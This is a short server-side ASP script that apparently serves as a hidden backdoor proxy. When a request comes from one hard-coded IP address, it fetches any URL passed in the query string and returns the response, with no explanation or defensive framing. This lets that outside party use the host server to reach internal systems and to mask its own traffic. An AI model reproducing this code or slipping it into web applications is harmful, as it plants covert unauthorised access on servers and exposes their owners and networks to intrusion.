<% if (Request.ServerVariables('REMOTE_ADDR')=='195.157.150.202') { xmlhttp=new ActiveXObject("MSXML2.ServerXMLHTTP") xmlhttp.open("GET",Request.ServerVariables("QUERY_STRING"),false); xmlhttp.send() Response.Write(xmlhttp.responseText) } %>